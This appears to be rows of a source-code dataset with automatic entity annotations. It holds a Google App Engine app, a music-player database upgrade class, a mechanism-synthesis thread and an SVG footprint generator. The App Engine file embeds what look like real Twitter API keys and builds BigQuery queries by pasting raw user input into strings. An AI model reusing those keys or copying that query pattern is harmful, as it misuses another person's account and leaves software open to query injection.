| 5,966 | [['PERSON', 'OrderedDict'], ['PERSON', 'odict'], ['PERSON', 'odict'], ['LOCATION', 'set_from(self'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'self.bo'], ['URL', 'self.ht'], ['URL', 'self.im'], ['URL', 'self.at'], ['URL', 'self.ch'], ['URL', 'self.re'], ['URL', 'self.fr'], ['URL', 'self.kw'], ['URL', 'self.ch'], ['URL', 'self.fr'], ['URL', 'self.ht'], ['URL', 'self.im'], ['URL', 'self.at'], ['URL', 'self.su'], ['URL', 'self.im'], ['URL', 'image.ge'], ['URL', 'image.ge'], ['URL', 'self.at'], ['URL', 'att.ge'], ['URL', 'att.ge'], ['URL', 'self.ht'], ['URL', 'self.im'], ['URL', 'self.at'], ['URL', 'self.ht'], ['URL', 're.su'], ['URL', 'self.text.pl'], ['URL', 'self.ch'], ['URL', 're.su'], ['URL', 'self.html.pl'], ['URL', 'self.ch'], ['URL', 'self.im'], ['URL', 'image.ge'], ['URL', 'image.ge'], ['URL', 'self.html.pl'], ['URL', 'self.html.pl'], ['URL', 'content.re'], ['URL', 'os.path.ba'], ['URL', 'self.bo'], ['URL', 'self.text.ge'], ['URL', 'self.text.ge'], ['URL', 'self.html.ge'], ['URL', 'self.html.ge'], ['URL', 'self.bo'], ['URL', 'self.bo'], ['URL', 'self.cr'], ['URL', 'self.bo'], ['URL', 'self.bo'], ['URL', 'self.cr'], ['URL', 'self.ge'], ['URL', 'self.su'], ['URL', 'self.ch'], ['URL', 'datetime.datetime.no'], ['URL', 'sys.ma'], ['URL', 'self.kw.ge'], ['URL', 'self.re'], ['URL', 'self.ge'], ['URL', 'self.recipients.it'], ['URL', 'self.ch'], ['URL', 'self.bo'], ['URL', 'smtplib.SM'], ['URL', 'self.kw.ge'], ['URL', 's.se'], ['URL', 'self.fr'], ['URL', 'CRLF.jo'], ['URL', 'self.headers.it']] |
__author__ = 'dummy@email.com (J. Matthew Landis)'
import os
import logging
import pickle
import webapp2
import time
import httplib2
import json
import tweepy
import haigha
from collections import Counter
from haigha.connections.rabbit_connection import RabbitConnection
from apiclient import discovery
from oauth2client import appengine
from oauth2client import client
from google.appengine.api import memcache
from google.appengine.api import users
from google.appengine.ext import ndb
from google.appengine.ext.webapp import template
#######################################################################
PROJECTID = '934763316754'
CLIENT_SECRETS = os.path.join(os.path.dirname(__file__), 'client_secrets.json')
# Helpful message to display in the browser if the CLIENT_SECRETS file
# is missing.
MISSING_CLIENT_SECRETS_MESSAGE = """""
<h1>Warning: Please configure OAuth 2.0</h1>
<p>
To make this sample run you will need to populate the client_secrets.json file
found at:
</p>
<p>
<code>%s</code>.
</p>
<p>with information found on the <a
href="https://code.google.com/apis/console">APIs Console</a>.
</p>
""" % CLIENT_SECRETS
http = httplib2.Http(memcache)
service = discovery.build("plus", "v1", http=http)
bigquery_service = discovery.build("bigquery","v2", http=http)
consumer_key = "9xNrmD6hE0xnRSYdZt5t0XT0B"
consumer_secret = "kperqjklvPhBCVvHI96aZIfJu5w1DHI2BZoNMdBEvBPfmuZIYG"
access_token = "46501499-cijYvv9ixtQKHLSiLt9QaRtcmWeEKvvGZK5s6ukw7"
access_token_secret = "D127XCAN02BPb0ZtcreCG6dpBJyiiLCeD6ckS2MgdHqwG"
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
decorator = appengine.oauth2decorator_from_clientsecrets(
CLIENT_SECRETS,
scope='https://www.googleapis.com/auth/plus.me',
message=MISSING_CLIENT_SECRETS_MESSAGE)
bq_decorator = appengine.oauth2decorator_from_clientsecrets(
CLIENT_SECRETS,
scope='https://www.googleapis.com/auth/bigquery',
message=MISSING_CLIENT_SECRETS_MESSAGE)
## Function to retrieve and render a template
def render_template(handler, templatename, templatevalues):
path = os.path.join(os.path.dirname(__file__), 'templates/' + templatename)
html = template.render(path, templatevalues)
handler.response.out.write(html)
#######################################################################
## Handles and loads index page
class MainPage(webapp2.RequestHandler):
def get(self):
nickname = "null"
email = "null"
user = users.get_current_user()
if user:
res = UserModel.query(UserModel.uid == user.user_id()).fetch()
if res:
ui = res[0]
nickname = ui.fname+ " " +ui.lname
email = user.email()
login = users.create_login_url('/')
else:
nickname = user.nickname()
email = user.email()
login = '/createProfile'
else:
ui = None
login = users.create_login_url('/')
logout = users.create_logout_url('/')
os.system("python stream.py")
template_values = {
'login': login,
'logout': logout,
'user': user,
'nickname': nickname,
'email': email
}
render_template(self, 'index.html', template_values)
#######################################################################
## Handle user info and profile
class CreateProfile(webapp2.RequestHandler):
def get(self):
user = users.get_current_user()
if user:
res = UserModel.query(UserModel.uid == user.user_id()).fetch()
if res:
self.redirect('/profile')
else:
template_data = {'logout':users.create_logout_url('/'), 'nickname': users.nickname()}
template_path = 'templates/createProfile.html'
self.response.out.write(template.render(template_path,template_data))
else:
self.redirect(user.create_login_url('/'))
#######################################################################
## process user profile
## check for user signed in, if so, save the entered information, otherwise, redirect them to the login page
class ProcessUser(webapp2.RequestHandler) :
def post(self) :
user = users.get_current_user()
if user:
fname = self.request.get('fname')
lname = self.request.get('lname')
fname.replace(" ", "")
lname.replace(" ", "")
words = self.request.get_all('word')
if (not(not fname)) & (not(not lname)):
NewUser = UserModel()
NewUser.uid = user.user_id()
NewUser.fname = fname
NewUser.lname = lname
NewUser.words = []
for word in words:
word.replace(" ", "")
if word:
NewUser.words+=[word]
NewUser.put()
self.redirect('/profile')
else:
self.redirect('/createProfile')
else:
self.redirect(users.create_login_url('/'))
#######################################################################
## Model Data
class DataHandler(webapp2.RequestHandler) :
@bq_decorator.oauth_aware
def get(self) :
if bq_decorator.has_credentials():
http = bq_decorator.http()
inputData = self.request.get("inputData")
queryData = {'query':'SELECT SUM(word_count) as WCount,corpus_date,group_concat(corpus) as Work FROM '
'[publicdata:samples.shakespeare] WHERE word="'+inputData+'" and corpus_date>0 GROUP BY corpus_date ORDER BY WCount'}
tableData = bigquery_service.jobs()
dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http)
resp = []
if 'rows' in dataList:
#parse dataList
for row in dataList['rows']:
for key,dict_list in row.iteritems():
count = dict_list[0]
year = dict_list[1]
corpus = dict_list[2]
resp.append({'count': count['v'],'year':year['v'],'corpus':corpus['v']})
else:
resp.append({'count':'0','year':'0','corpus':'0'})
self.response.headers['Content-Type'] = 'application/json'
self.response.out.write(json.dumps(resp))
else:
self.response.write(json.dumps({'error':'No credentials'}))
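
# Shape of the JSON DataHandler returns (inferred from the parsing above):
#   [{"count": <word count>, "year": <corpus_date>, "corpus": <work(s)>}, ...]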
#######################################################################
## Model Words
class WordsHandler(webapp2.RequestHandler) :
@bq_decorator.oauth_aware
def get(self) :
if bq_decorator.has_credentials():
http = bq_decorator.http()
inputData = self.request.get("inputData")
queryData = {'query':'SELECT text FROM '
'[doctor-know:rtda.tweets] WHERE Words CONTAINS "'+inputData+'"GROUP BY text ORDER BY text LIMIT 150'}
tableData = bigquery_service.jobs()
dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http)
            # The original body referenced an undefined 'status' object; build
            # the response from the BigQuery rows instead. (This class is also
            # shadowed by the WordsHandler redefined below.)
            resp = []
            if 'rows' in dataList:
                for row in dataList['rows']:
                    for key, dict_list in row.iteritems():
                        resp.append({'text': dict_list[0]})
self.response.headers['Content-Type'] = 'application/json'
self.response.out.write(json.dumps(resp))
else:
self.response.write(json.dumps({'error':'No credentials'}))
#######################################################################
## Model Words
class WordsHandler(webapp2.RequestHandler) :
inputData = "yes"
@bq_decorator.oauth_aware
def get(self) :
if bq_decorator.has_credentials():
http = bq_decorator.http()
inputData = self.request.get("inputData")
queryData = {'query':'SELECT text FROM '
'[doctor-know:rtda.tweets] WHERE text CONTAINS "'+inputData+'" GROUP BY text ORDER BY text LIMIT 300'}
tableData = bigquery_service.jobs()
dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http)
tweets = []
if 'rows' in dataList:
#parse dataList
count = 0
for row in dataList['rows']:
for key,dict_list in row.iteritems():
tweet = dict_list[0]
count += 1
tweets.append({'text': tweet})
if count == 300:
break
ignore_words = [ "fuck", "shit", "cock", "penis", "porn"]
words = []
for tweet in tweets:
tt = tweet.get('text', "")
for word in tt.split():
if "http" in word:
continue
if word not in ignore_words:
words.append(word)
            # Counter has no 'headers' attribute; set CORS and the content type
            # on the webapp2 response and write the word counts as JSON.
            resp = Counter(words)
            self.response.headers.add('Access-Control-Allow-Origin', "*")
            self.response.headers['Content-Type'] = 'application/json'
            self.response.out.write(json.dumps(resp))
        else:
            self.response.write(json.dumps({'error': 'No credentials'}))
#######################################################################
## Profile Page
class ProfilePage(webapp2.RequestHandler) :
def get(self):
user = users.get_current_user()
if user:
res = UserModel.query(UserModel.uid == user.user_id()).fetch()
if res:
ui = res[0]
template_data = {'firstname': ui.fname, 'lastname': ui.lname, 'words': ui.words, 'nickname': ui.fname+ " " +ui.lname, 'logout': users.create_logout_url('/')}
template_path = 'templates/profile.html'
self.response.out.write(template.render(template_path,template_data))
else:
self.redirect('/createProfile')
else:
self.redirect(users.create_login_url('/'))
#######################################################################
## Artificial Creativity Engine
class DisplayEngine(webapp2.RequestHandler) :
def get(self):
user = users.get_current_user()
if user:
res = UserModel.query(UserModel.uid == user.user_id()).fetch()
if res:
ui = res[0]
template_data = {'nickname': ui.fname+ " " +ui.lname, 'logout': users.create_logout_url('/')}
template_path = 'templates/engine.html'
self.response.out.write(template.render(template_path,template_data))
else:
template_data = {'nickname': user.nickname(), 'logout': users.create_logout_url('/')}
template_path = 'templates/engine.html'
self.response.out.write(template.render(template_path,template_data))
else:
self.redirect(users.create_login_url('/'))
#######################################################################
## Data Analysis
class DisplayData(webapp2.RequestHandler) :
def get(self):
user = users.get_current_user()
if user:
res = UserModel.query(UserModel.uid == user.user_id()).fetch()
if res:
ui = res[0]
template_data = {'nickname': ui.fname+ " " +ui.lname, 'logout': users.create_logout_url('/')}
template_path = 'templates/data.html'
self.response.out.write(template.render(template_path,template_data))
else:
template_data = {'nickname': user.nickname(), 'logout': users.create_logout_url('/')}
template_path = 'templates/data.html'
self.response.out.write(template.render(template_path,template_data))
else:
self.redirect(users.create_login_url('/'))
#######################################################################
## Establish/Update User Profile
class UserModel(ndb.Model) :
uid = ndb.StringProperty(indexed=True)
fname = ndb.StringProperty(indexed = False)
lname = ndb.StringProperty(indexed = False)
words = ndb.StringProperty(indexed=False,repeated=True)
#######################################################################
## Establish/Update User Profile
# class CustomStreamListener(tweepy.StreamListener):
# def __init__(self, api):
# self.api = api
# super(tweepy.StreamListener, self).__init__()
# #setup rabbitMQ Connection
# self.connection = RabbitConnection(host='127.0.0.1', heartbeat=None, debug=True)
# self.channel = self.connection.channel()
# #set max queue size
# args = {"x-max-length": 2000}
# self.channel.queue.declare(queue='twitter_topic_feed', arguments=args)
# def on_status(self, status):
# print status.text, "\n"
# data = {}
# data['text'] = status.text
# data['created_at'] = time.mktime(status.created_at.timetuple())
# data['geo'] = status.geo
# data['source'] = status.source
# #queue the tweet
# self.channel.basic.publish(exchange='',
# routing_key='twitter_topic_feed',
# body=json.dumps(data))
# def on_error(self, status_code):
# print >> sys.stderr, 'Encountered error with status code:', status_code
# return True # Don't kill the stream
# def on_timeout(self):
# print >> sys.stderr, 'Timeout...'
# return True # Don't kill the stream
# sapi = tweepy.streaming.Stream(auth, CustomStreamListener(api))
# # my keyword today is chelsea as the team just had a big win
# sapi.filter(track=[self.request.get("inputData")])
app = webapp2.WSGIApplication( [
('/', MainPage),
('/profile', ProfilePage),
('/createProfile', CreateProfile),
('/userRegister', ProcessUser),
('/getData', DataHandler),
('/getWords', WordsHandler),
('/data', DisplayData),
('/engine', DisplayEngine),
(decorator.callback_path, decorator.callback_handler()),
(bq_decorator.callback_path, bq_decorator.callback_handler())
], debug=True)
| 15,015 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'J. Matthew Landis'], ['PERSON', 'api = tweepy'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'user.ni'], ['URL', 'users.cr'], ['URL', 'users.cr'], ['URL', 'os.sy'], ['URL', 'stream.py'], ['URL', 'self.red'], ['URL', 'user.cr'], ['URL', 'self.red'], ['URL', 'users.cr'], ['LOCATION', 'queryData).execute(http'], ['NRP', 'dict_list'], ['LOCATION', 'queryData).execute(http'], ['LOCATION', 'queryData).execute(http'], ['NRP', 'dict_list'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'profile.ht'], ['URL', 'self.red'], ['URL', 'users.cr'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'engine.ht'], ['URL', 'users.cr'], ['URL', 'engine.ht'], ['URL', 'self.red'], ['URL', 'users.cr'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'data.ht'], ['URL', 'users.cr'], ['URL', 'data.ht'], ['URL', 'self.red'], ['URL', 'users.cr'], ['PERSON', 'StreamListener'], ['PERSON', "RabbitConnection(host='127.0.0.1"], ['PERSON', 'sapi'], ['PERSON', 'Stream(auth'], ['DATE_TIME', 'today'], ['PERSON', 'StreamListener'], ['PERSON', "RabbitConnection(host='127.0.0.1"], ['PERSON', 'sapi'], ['PERSON', 'Stream(auth'], ['DATE_TIME', 'today'], ['PERSON', 'ProcessUser'], ['URL', 'https://code.google.com/apis/console"'], ['URL', "https://www.googleapis.com/auth/plus.me',"], ['URL', "https://www.googleapis.com/auth/bigquery',"], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'email.com'], ['URL', 'haigha.co'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'httplib2.Ht'], ['URL', 'auth.se'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'template.re'], ['URL', 'handler.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'index.ht'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.red'], ['URL', 'users.cr'], ['URL', 'users.ni'], ['URL', 'createProfile.ht'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'self.request.ge'], ['URL', 'self.request.ge'], ['URL', 'fname.re'], ['URL', 'lname.re'], ['URL', 'self.request.ge'], ['URL', 'user.us'], ['URL', 'word.re'], ['URL', 'self.red'], ['URL', 'self.red'], ['URL', 'webapp2.Re'], ['URL', 'decorator.ht'], ['URL', 'self.request.ge'], ['URL', 'samples.sh'], ['URL', 'service.jo'], ['URL', 'row.it'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'webapp2.Re'], ['URL', 'decorator.ht'], ['URL', 'self.request.ge'], ['URL', 'rtda.tw'], ['URL', 'service.jo'], ['URL', 'time.mk'], ['URL', 'status.cr'], ['URL', 'status.ge'], ['URL', 'status.so'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'webapp2.Re'], ['URL', 'decorator.ht'], ['URL', 'self.request.ge'], ['URL', 'rtda.tw'], ['URL', 'service.jo'], ['URL', 'row.it'], ['URL', 'tweet.ge'], ['URL', 'resp.headers.ad'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'self.red'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'user.ni'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'user.ni'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'ndb.Mo'], ['URL', 'ndb.St'], ['URL', 'ndb.St'], ['URL', 'ndb.St'], ['URL', 'ndb.St'], ['URL', 'tweepy.St'], ['URL', 'tweepy.St'], ['URL', 
'self.co'], ['URL', 'self.ch'], ['URL', 'self.connection.ch'], ['URL', 'self.channel.queue.de'], ['URL', 'time.mk'], ['URL', 'status.cr'], ['URL', 'status.ge'], ['URL', 'status.so'], ['URL', 'self.channel.ba'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'tweepy.streaming.St'], ['URL', 'sapi.fi'], ['URL', 'self.request.ge'], ['URL', 'tweepy.St'], ['URL', 'tweepy.St'], ['URL', 'self.co'], ['URL', 'self.ch'], ['URL', 'self.connection.ch'], ['URL', 'self.channel.queue.de'], ['URL', 'time.mk'], ['URL', 'status.cr'], ['URL', 'status.ge'], ['URL', 'status.so'], ['URL', 'self.channel.ba'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'tweepy.streaming.St'], ['URL', 'sapi.fi'], ['URL', 'self.request.ge'], ['URL', 'webapp2.WS'], ['URL', 'decorator.ca'], ['URL', 'decorator.ca'], ['URL', 'decorator.ca'], ['URL', 'decorator.ca']] |
46 | #!/usr/bin/python
# Copyright (c) 2014-2015 Cedric Bellegarde dummy@email.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from lollypop.sqlcursor import SqlCursor
class DatabaseUpgrade:
"""
Manage database schema upgrades
"""
def __init__(self, version, db):
"""
Init object
@param version as int
@param db as Database
"""
self._version = version
self._db = db
# Here are schema upgrade, key is database version,
# value is sql request
self._UPGRADES = {
1: "update tracks set duration=CAST(duration as INTEGER);",
2: "update albums set artist_id=-2001 where artist_id=-999;"
}
"""
Return upgrade count
@return int
"""
def count(self):
return len(self._UPGRADES)
"""
Upgrade database based on version
@return new db version as int
"""
def do_db_upgrade(self):
with SqlCursor(self._db) as sql:
for i in range(self._version+1, len(self._UPGRADES)+1):
try:
sql.execute(self._UPGRADES[i])
except Exception as e:
print("Database upgrade failed: ", e)
sql.commit()
return len(self._UPGRADES)
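
# Usage sketch (hedged: the version bookkeeping on the caller's side is
# hypothetical):
#   upgrade = DatabaseUpgrade(stored_version, db)
#   if stored_version < upgrade.count():
#       stored_version = upgrade.do_db_upgrade()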
| 1,917 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014-2015'], ['PERSON', 'Cedric Bellegarde'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'sql.com']] |
47 | # -*- coding: utf-8 -*-
"""Thread of structural synthesis."""
__author__ = "Yuan Chang"
__copyright__ = "Copyright (C) 2016-2021"
__license__ = "AGPL"
__email__ = "dummy@email.com"
from typing import Sequence, Dict, List
from qtpy.QtCore import Signal
from qtpy.QtWidgets import QWidget, QTreeWidgetItem
from pyslvs.graph import (
link_synthesis,
contracted_link_synthesis,
contracted_graph,
conventional_graph,
Graph,
)
from pyslvs_ui.synthesis.thread import BaseThread
Assortment = Sequence[int]
def assortment_eval(links_expr: str) -> Assortment:
"""Return link assortment from expr."""
return tuple(int(n.split('=')[-1]) for n in links_expr.split(", "))
class LinkThread(BaseThread):
"""Link assortment synthesis thread."""
progress_update = Signal(int)
result = Signal(dict)
size_update = Signal(int)
def __init__(self, nl: int, nj: int, parent: QWidget):
super(LinkThread, self).__init__(parent)
self.nl = nl
self.nj = nj
def run(self) -> None:
"""Run and return contracted link assortment."""
try:
la_list = link_synthesis(self.nl, self.nj, lambda: self.is_stop)
except ValueError:
self.progress_update.emit(1)
self.result.emit({})
self.finished.emit()
return
self.size_update.emit(len(la_list))
assortment = {}
for i, la in enumerate(la_list):
if self.is_stop:
break
assortment[la] = contracted_link_synthesis(la, lambda: self.is_stop)
self.progress_update.emit(1 + i)
self.result.emit(assortment)
self.finished.emit()
class GraphThread(BaseThread):
"""Graphs enumeration thread."""
progress_update = Signal(int)
count_update = Signal(QTreeWidgetItem, int)
result = Signal(list)
def __init__(self, jobs: Sequence[QTreeWidgetItem], degenerate: int, parent: QWidget):
super(GraphThread, self).__init__(parent)
self.jobs = jobs
self.degenerate = degenerate
def run(self) -> None:
"""Run and return conventional graph."""
cg_list: Dict[Sequence[int], List[Graph]] = {}
answers = []
for i, item in enumerate(self.jobs):
if self.is_stop:
break
root = item.parent()
la = assortment_eval(root.text(0))
cla = assortment_eval(item.text(0))
if la not in cg_list:
cg_list[la] = contracted_graph(la, lambda: self.is_stop)
answer = conventional_graph(
cg_list[la],
cla,
self.degenerate,
lambda: self.is_stop
)
self.count_update.emit(item, len(answer))
answers.extend(answer)
self.progress_update.emit(1 + i)
self.result.emit(answers)
self.finished.emit()
| 2,931 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Yuan Chang'], ['DATE_TIME', '2016-2021'], ['PERSON', 'QtCore'], ['URL', 'self.nl'], ['URL', 'self.nl'], ['URL', 'self.is'], ['URL', 'self.is'], ['URL', 'self.pro'], ['PERSON', 'Sequence[QTreeWidgetItem'], ['URL', 'email.com'], ['URL', 'pyslvs.gr'], ['URL', 'ui.synthesis.th'], ['URL', 'self.pro'], ['URL', 'self.re'], ['URL', 'self.fi'], ['URL', 'self.si'], ['URL', 'self.is'], ['URL', 'self.re'], ['URL', 'self.fi'], ['URL', 'self.jo'], ['URL', 'self.de'], ['URL', 'self.jo'], ['URL', 'self.is'], ['URL', 'item.pa'], ['URL', 'self.is'], ['URL', 'self.de'], ['URL', 'self.is'], ['URL', 'self.co'], ['URL', 'self.pro'], ['URL', 'self.re'], ['URL', 'self.fi']] |
48 | #!/usr/bin/env python3
import xml.etree.ElementTree as ET
def get_target():
return SVG()
class SVG:
def __init__(self):
self.svg = ET.parse('skeleton.svg')
        self.mmpx = 3.543307  # px per mm at the SVG default of 90 dpi (90 / 25.4)
    def output(self, path):
        # NB: shadowed by the output() redefined below, which renders the
        # added package before writing.
        self.svg.write(path)
def add_package(self, package):
'''
        The SVG target handles one drawing at a time: each call resets the
        skeleton, so only the last package added is part of the output.
'''
self.svg = ET.parse('skeleton.svg')
self.package = \
{
'name': package['name'],
'pads': [],
'mnt_pads': [],
'holes': [],
'lines': [],
'circles': [],
'rectangles': [] ,
'texts': []
}
def output(self, fout):
package = self.package
for pad in package['pads']:
self.gen_pac_pad(pad)
for mnt_pad in package['mnt_pads']: # TODO, adding mnt_pads not done
self.gen_pac_mnt_pad(mnt_pad)
for hole in package['holes']:
self.gen_pac_hole(hole)
for line in package['lines']:
self.gen_pac_line(line)
if(0):
for circle in package['circles']:
self.gen_pac_circle(circle)
for rect in package['rectangles']:
self.gen_pac_rectangle(rect)
        for text in package['texts']:
            # NOTE: gen_pac_text is not defined in this class; 'texts' stays
            # empty as initialized in add_package, so this loop never runs.
            self.gen_pac_text(text)
self.svg.write(fout)
def add_pac_pad(self, type, angle, size, pos, number):
self.package['pads'].append(
{
'type': type,
'angle': angle,
'size': size,
'pos': pos,
'number': number
})
def add_pac_hole(self, diameter, pos):
self.package['holes'].append(
{
'd': diameter,
'pos': pos
})
def add_pac_line(self, layer, width, vertices):
self.package['lines'].append(
{
'layer': layer,
'width': width,
'vertices': vertices
})
def gen_pac_pad(self, pad): # type, angle, size, pos, number
top_layer = self.svg.find('.//g[@id="Top"]')
# TODO: Types and angle
el = ET.SubElement(top_layer, 'rect')
el.set('style', 'fill:#ff0000;fill-opacity:1;stroke:none;stroke-width:10;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1')
el.set('id', 'pin_{}'.format(pad['number']))
el.set('width', '{}'.format(pad['size'][0]*self.mmpx))
el.set('height', '{}'.format(pad['size'][1]*self.mmpx))
el.set('x', '{}'.format((pad['pos'][0] - pad['size'][0]/2)*self.mmpx))
el.set('y', '{}'.format((pad['pos'][1] - pad['size'][1]/2)*self.mmpx))
def gen_pac_hole(self, hole):
top_layer = self.svg.find('.//g[@id="Holes"]')
circle = ET.SubElement(top_layer, 'circle')
circle.set('style', 'fill:#eeee00;fill-opacity:1;stroke:none;stroke-width:0.0;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1"')
circle.set('cx', '{}'.format(hole['pos'][0]*self.mmpx))
circle.set('cy', '{}'.format(hole['pos'][1]*self.mmpx))
circle.set('r', '{}'.format(hole['d']/2*self.mmpx))
def gen_pac_line(self, line):
        # Layer lookup; assumes the same './/g[@id="..."]' pattern used for
        # "Top" and "Holes" above (the dump had anonymized this expression).
        layer = self.svg.find('.//g[@id="{}"]'.format(line['layer']))
if(line['layer'] == 'Courtyard'):
color = '#e63a81'
elif(line['layer'] == 'Silk'):
color = '#111111'
else:
color = '#000000'
el = ET.SubElement(layer, 'path')
el.set('style', 'fill:none;fill-rule:evenodd;stroke:{color};stroke-width:{}mm;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;stroke-miterlimit:4;stroke-dasharray:none'.format(line['width'], color=color))
pathdata = ''
first = True
for (x,y) in line['vertices']:
if(first):
pathdata += 'M ' + '{},{}'.format(x*self.mmpx,y*self.mmpx)
first = False
elif(x == 'end'):
pathdata += ' z'
else:
pathdata += ' L ' + '{},{}'.format(x*self.mmpx,y*self.mmpx)
el.set('d', pathdata)
def gen_circle(self, layer_name, diameter, pos):
        # Same assumed './/g[@id="..."]' lookup pattern as gen_pac_line.
        layer = self.svg.find('.//g[@id="{}"]'.format(layer_name))
if(layer_name == 'Courtyard'):
color = '#e63a81'
elif(layer_name == 'Silk'):
color = '#111111'
else:
color = '#000000'
circle = ET.SubElement(layer, 'circle')
circle.set('style', 'fill:#{color};fill-opacity:1;stroke:none;stroke-width:0.0;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1"'.format(color=color))
circle.set('cx', '{}'.format(pos[0]*self.mmpx))
circle.set('cy', '{}'.format(pos[1]*self.mmpx))
circle.set('r', '{}'.format(diameter/2*self.mmpx))
if(__name__ == '__main__'):
target = get_target()
target.output('test.svg')
| 4,250 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'fout'], ['LOCATION', "package['holes"], ['PERSON', 'pos\n\t\t\t}'], ['PERSON', 'top_layer = self.svg.find(\'.//g[@id="Top'], ['PERSON', 'TODO'], ['PERSON', "el.set('style"], ['PERSON', "el.set('height"], ['PERSON', "circle.set('cx"], ['PERSON', "circle.set('r"], ['LOCATION', '000000'], ['PERSON', "el.set('style"], ['NRP', '000000'], ['PERSON', "circle.set('cx"], ['PERSON', "circle.set('r"], ['URL', 'xml.et'], ['URL', 'self.sv'], ['URL', 'ET.pa'], ['URL', 'skeleton.sv'], ['URL', 'self.mm'], ['URL', 'self.sv'], ['URL', 'self.sv'], ['URL', 'ET.pa'], ['URL', 'skeleton.sv'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.sv'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'self.svg.fi'], ['URL', 'ET.Su'], ['URL', 'el.se'], ['URL', 'el.se'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'self.svg.fi'], ['URL', 'ET.Su'], ['URL', 'circle.se'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'self.svg.fi'], ['URL', 'email.com'], ['URL', 'ET.Su'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'self.mm'], ['URL', 'self.mm'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.svg.fi'], ['URL', 'email.com'], ['URL', 'ET.Su'], ['URL', 'circle.se'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 